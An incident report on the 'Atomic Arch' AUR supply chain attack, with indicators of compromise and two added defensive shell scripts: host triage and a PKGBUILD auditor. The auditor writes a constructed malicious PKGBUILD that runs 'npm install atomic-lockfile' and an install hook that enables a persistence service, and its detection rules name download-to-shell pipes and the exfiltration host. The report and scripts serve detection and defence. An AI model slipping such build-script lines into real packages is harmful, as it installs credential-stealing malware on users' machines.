Full Report
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them. The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide itself. The AUR is Arch Linux's community package collection, and it is separate
Analysis Summary
# Incident Report: Atomic Arch Supply Chain Attack
## Executive Summary
In June 2026, a large supply chain attack dubbed "Atomic Arch" compromised over 400 packages in the Arch User Repository (AUR). Attackers adopted orphaned packages and modified their build scripts to deploy a Rust-based credential stealer and, when the payload ran as root, an eBPF rootkit. The campaign targeted developer environments to harvest secrets, SSH keys, and session tokens; anyone who built a compromised package during the window of infection was affected, whether or not the package was ultimately installed.
## Incident Details
- **Discovery Date:** June 12, 2026
- **Incident Date:** Began approximately June 11, 2026
- **Affected Organization:** Arch User Repository (AUR) Community
- **Sector:** Technology / Software Development
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** June 11, 2026
- **Vector:** Abuse of the AUR orphan/adoption process.
- **Details:** Attackers identified abandoned (orphaned) packages and adopted them through the normal AUR adoption process, which hands maintainership of an orphaned package to whoever requests it. No breach of Arch Linux infrastructure was needed; the attackers became the legitimate maintainers of record.
### Execution
- **Technique:** Supply chain injection through build and install scripts.
- **Details:** Once in control of a package, attackers modified its `PKGBUILD` or `.install` script to run `npm install atomic-lockfile`, which fetched a malicious npm package carrying the `deps` binary. A modified `PKGBUILD` executes at build time with the privileges of the user running `makepkg`, so the payload ran on every machine that built an affected package; a modified `.install` hook runs under pacman, as root, when the package is installed, which is the path that gave the payload root on some hosts.
### Data Exfiltration/Impact
- **Assets:** The malware targeted browser cookies/tokens (Chromium-based), Electron session data (Slack, Discord, Teams), developer secrets (GitHub, npm, HashiCorp Vault), OpenAI API keys, SSH keys, shell histories, and VPN profiles.
- **Impact:** Compromised data was exfiltrated via HTTP to `temp[.]sh`.
### Detection & Response
- **Discovery:** Identified by security researchers (Sonatype and Whanos) and community members noticing suspicious modifications to build scripts.
- **Response Actions:** Malicious npm packages were pulled from the npm registry; Arch Linux Trusted Users began reverting/deleting compromised AUR entries; community-maintained lists of affected packages were published.
## Attack Methodology
- **Initial Access:** Adoption of orphaned community packages.
- **Persistence:** Installation of a `systemd` service with `Restart=always`, at the system level when the payload ran as root and at the user level otherwise.
- **Privilege Escalation:** Not inherently part of the payload; the malware utilized existing privileges of the user running the build script.
- **Defense Evasion:** Use of an optional eBPF rootkit (when root) to hide PIDs, socket inodes, and process names; spoofing Git commit metadata to mimic legitimate maintainers.
- **Credential Access:** Scraping local storage, config files, and shell history for tokens and keys.
- **Collection:** Automated searching for specific developer-centric file paths and database files.
- **Exfiltration:** Data sent to `temp[.]sh` with C2 communication routed through a Tor onion service via a local loopback proxy.
- **Impact:** Potential permanent host compromise via rootkit and secondary payloads (possible cryptominer).
## Impact Assessment
- **Financial:** Indirect costs related to credential rotation and incident response for affected development firms.
- **Data Breach:** Extensive theft of developer-specific credentials and internal session tokens.
- **Operational:** Disruption to developer workflows and trust in the AUR ecosystem.
- **Reputational:** Significant blow to the community-driven trust model of the Arch User Repository.
## Indicators of Compromise
- **Network:** Outbound connections to `temp[.]sh` and Tor-related loopback traffic.
- **File Indicators:**
- `atomic-lockfile` (npm package)
- `deps` (Linux ELF binary)
- Pinned BPF maps: `hidden_pids`, `hidden_names`, `hidden_inodes`
- **Behavioral:** Creation of `systemd` services not owned by any package; `npm` spawned during the build of a package that declares no Node.js dependency.
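A host-side triage script for the indicators listed above, added here as an example; it is not part of the original report and not Arch tooling. Every check takes a root prefix so the same functions run against a mounted disk image, and the tree the demo builds is constructed input, not a real capture. The BPF map names, the `deps` binary name and the `atomic-lockfile` package come from the indicator list; the locations it searches (`/etc/systemd/system`, `~/.config/systemd/user`, home directories, `/tmp`, `/var/tmp`) and the sample unit's `ExecStart` path are assumptions about where such drops land, not facts from the report.

```shell
#!/bin/sh
# hunt_atomic_arch.sh: host triage for the indicators above. Every check takes a
# root prefix (default "/") so the same functions run against a mounted disk
# image or, in the demo, a constructed tree. Hits print as "<indicator> <path>";
# hunt_all returns 1 if anything was found. Run as root on a live host.
# Caveat: a loaded rootkit filters PIDs, process names and socket inodes from
# what this host reports, so prefer a rescue boot or a mounted image, and on a
# live host cross-check with `bpftool map show`, which lists maps kernel-side.

# Pinned maps left by the eBPF rootkit. Pinning is what lets a map outlive its
# loader, so these names under bpffs are a strong signal even after cleanup.
check_bpf_maps() {
    root=${1:-/}
    for name in hidden_pids hidden_names hidden_inodes; do
        find "$root/sys/fs/bpf" -name "$name" 2>/dev/null | sed 's|^|bpf-map-pinned |'
    done
}

# Persistence: Restart=always units in admin or user unit directories (units
# shipped by packages live under /usr/lib). A unit whose ExecStart is a binary
# named "deps" is reported on its own; the rest are listed for review.
check_units() {
    root=${1:-/}
    for unitdir in "$root/etc/systemd/system" "$root"/home/*/.config/systemd/user \
                   "$root/root/.config/systemd/user"; do
        [ -d "$unitdir" ] || continue
        for unit in "$unitdir"/*.service; do
            [ -f "$unit" ] || continue
            grep -q '^Restart=always' "$unit" || continue
            exec_line=$(grep '^ExecStart=' "$unit" | head -n 1)
            case $exec_line in
                *'/deps'|*'/deps '*|*'=deps'|*'=deps '*)
                    printf 'unit-execs-deps %s  %s\n' "$unit" "$exec_line" ;;
                *)  printf 'unit-restart-always %s  %s\n' "$unit" "$exec_line" ;;
            esac
        done
    done
}

# The dropped binary: a file named "deps" that really is an ELF executable,
# checked by magic bytes so a harmless script with the same name is skipped.
check_deps_binary() {
    root=${1:-/}
    find "$root/home" "$root/root" "$root/tmp" "$root/var/tmp" -type f -name deps 2>/dev/null |
    while IFS= read -r f; do
        magic=$(dd if="$f" bs=4 count=1 2>/dev/null | od -An -c | tr -d ' ')
        if [ "$magic" = '177ELF' ]; then printf 'deps-elf-binary %s\n' "$f"; fi
    done
}

# The npm side: the malicious package unpacked into a node_modules tree, or
# named by any package.json under a home directory.
check_npm_artifacts() {
    root=${1:-/}
    find "$root/home" "$root/root" -type d -name atomic-lockfile -path '*/node_modules/*' \
        2>/dev/null | sed 's|^|npm-atomic-lockfile |'
    find "$root/home" "$root/root" -type f -name package.json \
        -exec grep -l '"atomic-lockfile"' {} + 2>/dev/null | sed 's|^|npm-atomic-lockfile-ref |'
}

hunt_all() { # hunt_all [ROOT]: run every check, print hits, return 1 if any
    root=${1:-/}
    out=$(check_bpf_maps "$root"; check_units "$root"; check_deps_binary "$root"; check_npm_artifacts "$root")
    if [ -n "$out" ]; then printf '%s\n' "$out"; fi
    [ -z "$out" ]
}

# Constructed tree reproducing the indicators (demo input, not a real capture).
make_compromised_tree() {
    d=$1
    mkdir -p "$d/sys/fs/bpf" "$d/home/dev/.config/systemd/user" \
             "$d/home/dev/.local/share" "$d/home/dev/proj/node_modules/atomic-lockfile"
    : > "$d/sys/fs/bpf/hidden_pids"
    printf '[Service]\nExecStart=/home/dev/.local/share/deps\nRestart=always\n' \
        > "$d/home/dev/.config/systemd/user/deps.service"
    printf '\177ELF\002\001\001' > "$d/home/dev/.local/share/deps"   # ELF magic only
    printf '#!/bin/sh\necho not malware\n' > "$d/home/dev/proj/deps" # decoy, same name
    printf '{"name":"atomic-lockfile","version":"0.0.0"}\n' \
        > "$d/home/dev/proj/node_modules/atomic-lockfile/package.json"
}

# Scans the given root (default /) when executed as a script.
case $0 in *hunt_atomic_arch*) hunt_all "${1:-/}" ;; esac
```

To run it against a mounted image, point the first argument at the mount point (`hunt_atomic_arch.sh /mnt/suspect`); to try the demo, source the file and call `make_compromised_tree` on a temporary directory, then `hunt_all` on it. Any hit in the `bpf-map-pinned` or `unit-execs-deps` categories should be treated as a confirmed compromise and trigger the secret rotation described under Recovery; `unit-restart-always` lines are a review list, not a verdict.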
## Response Actions
- **Containment:** Removal of the `atomic-lockfile` package from npm.
- **Eradication:** Deletion of hijacked packages from the AUR.
- **Recovery:** Users advised to audit all AUR packages updated after June 11 and rotate all potentially exposed secrets (SSH, GitHub, etc.).
## Lessons Learned
- **Orphan Policy Risks:** Automated or low-friction adoption of orphaned packages provides a platform for "repo-jacking."
- **Build Script Vulnerability:** Users often trust the source code of a package but fail to audit the build instructions (`PKGBUILD`), which run with the same permissions as the user.
- **Trust Model Limits:** Name-based trust and historical reputation are insufficient if the ownership of a package can change without a rigorous vetting process.
## Recommendations
- **Pre-Build Auditing:** Read the `PKGBUILD` and any `.install` file before building, and review the diff against the previous revision rather than the file in isolation. AUR packages are git repositories, so `git log -p` on the checkout shows exactly what changed; since this campaign spoofed commit metadata to mimic legitimate maintainers, judge the content of the change, not its author line. A package-manager fetch (`npm install`, `pip install`), a download piped into a shell, or any `systemctl` call in a build script is a stop signal.
- **Sandboxed Builds:** Build AUR packages in a clean chroot (devtools' `makechrootpkg`) or a throwaway container that does not mount the real home directory, so a malicious `PKGBUILD` cannot reach `~/.ssh`, browser profiles or shell history on the host. This does not cover a malicious `.install` hook, which runs as root when the package is installed, so the audit step still matters.
- **Credential Management:** Use hardware security keys (FIDO2) for GitHub and SSH, and keep API tokens in an agent or secret manager rather than in plaintext config files, so that file-based credential theft yields as little as possible.
- **AUR Policy Change:** Implement a mandatory "waiting period" or manual review for new maintainers taking over orphaned packages.
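A pre-build audit script covering the build-script modification described in the timeline and the Pre-Build Auditing recommendation above, added here as an example; it is not the report's or Arch's own tooling. The rules encode what this incident's build scripts did (a package-manager fetch from a non-JS package, a service enabled by an install hook) together with generic download-to-shell and obfuscation checks. The two sample checkouts it writes are constructed, the package name `example-tool` and its URLs are invented, and the severity levels are this script's own convention.

```shell
#!/bin/sh
# audit_pkgbuild.sh: heuristic review of an AUR checkout before running makepkg.
# Flags what the Atomic Arch build scripts did (a language package manager run
# from build/install steps, a service enabled at build time) plus the generic
# tells: download-to-shell pipes, live unit directories outside $pkgdir, the
# known exfil/C2 hosts, base64/eval obfuscation. Findings print as
# "<SEVERITY> <file>:<line>:<text>  [reason]"; the function returns 1 when any
# HIGH finding exists, so it can gate a build:  audit_pkgbuild ./pkg && makepkg -si

check() { # check SEVERITY "reason" EXTENDED-REGEX FILE
    sev=$1 reason=$2 re=$3 file=$4
    grep -nE "$re" "$file" | while IFS= read -r hit; do
        printf '%s %s:%s  [%s]\n' "$sev" "${file##*/}" "$hit" "$reason"
    done
}

audit_pkgbuild() { # audit_pkgbuild DIR  (DIR holds PKGBUILD and optional *.install)
    dir=$1
    # npm belongs in a Node package (single-line depends arrays assumed); in any
    # other package a package-manager fetch is the headline indicator here.
    if grep -qE '^(make)?depends=.*(^|[^[:alnum:]_-])(nodejs|npm)([^[:alnum:]_-]|$)' \
            "$dir/PKGBUILD" 2>/dev/null; then pm_sev=MEDIUM; else pm_sev=HIGH; fi
    out=$(
        for file in "$dir"/PKGBUILD "$dir"/*.install; do
            [ -f "$file" ] || continue
            check "$pm_sev" 'package manager fetch inside a build script' \
                '(^|[^[:alnum:]_])(npm|npx|yarn|pnpm|pip3?|cargo|gem)[[:space:]]+(install|i|add|exec)([^[:alnum:]_]|$)' "$file"
            check HIGH 'download piped into a shell' \
                '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$file"
            check HIGH 'known Atomic Arch exfil/C2 endpoint' 'temp\.sh|\.onion' "$file"
            check HIGH 'service enabled or started by a build script' \
                'systemctl([[:space:]]+--user)?[[:space:]]+(enable|start|daemon-reload)' "$file"
            check MEDIUM 'unit written to a live systemd directory instead of $pkgdir' \
                '(~|HOME[}]?)/\.config/systemd/user|(^|[^r"}])/etc/systemd/system' "$file"
            check MEDIUM 'possible obfuscated payload' \
                'base64[[:space:]]+(-d|--decode)|eval[[:space:]]+"?\$' "$file"
            check INFO 'maintainer line: diff against the previous revision' '^# *Maintainer:' "$file"
        done
    )
    if [ -n "$out" ]; then printf '%s\n' "$out"; fi
    if printf '%s\n' "$out" | grep -q '^HIGH'; then return 1; fi
    return 0
}

# Two constructed checkouts (not real AUR packages) exercising the rules:
# DIR/bad mirrors the incident, DIR/good is the same package done properly.
make_samples() {
    mkdir -p "$1/bad" "$1/good"
    cat > "$1/bad/PKGBUILD" <<'EOF'
# Maintainer: New Adopter <new@example.invalid>
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
depends=('glibc')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$pkgname-$pkgver"
  npm install atomic-lockfile >/dev/null 2>&1 || true
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
    cat > "$1/bad/example-tool.install" <<'EOF'
post_install() {
  systemctl --user enable --now deps.service 2>/dev/null || true
}
EOF
    cat > "$1/good/PKGBUILD" <<'EOF'
# Maintainer: Long-time Maintainer <old@example.invalid>
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
depends=('glibc')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz" example.service)
sha256sums=('SKIP' 'SKIP')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  install -Dm644 ../example.service "$pkgdir/usr/lib/systemd/system/example.service"
}
EOF
}

# Runs the audit on the given directory when executed as a script.
case $0 in *audit_pkgbuild*) audit_pkgbuild "${1:-.}" ;; esac
```

The good checkout installs a unit file under `$pkgdir/usr/lib/systemd/system`, which is how a package is supposed to ship a service, and produces only the INFO maintainer line; the bad one fails on the `npm install atomic-lockfile` line in `build()` and on the `systemctl --user enable` in its install hook. The rules are deliberately plain regexes so they can be read and extended in the same review session as the PKGBUILD itself; they catch the incident's pattern, not a determined adversary who hides the fetch behind indirection, which is why the sandboxed build remains the second line.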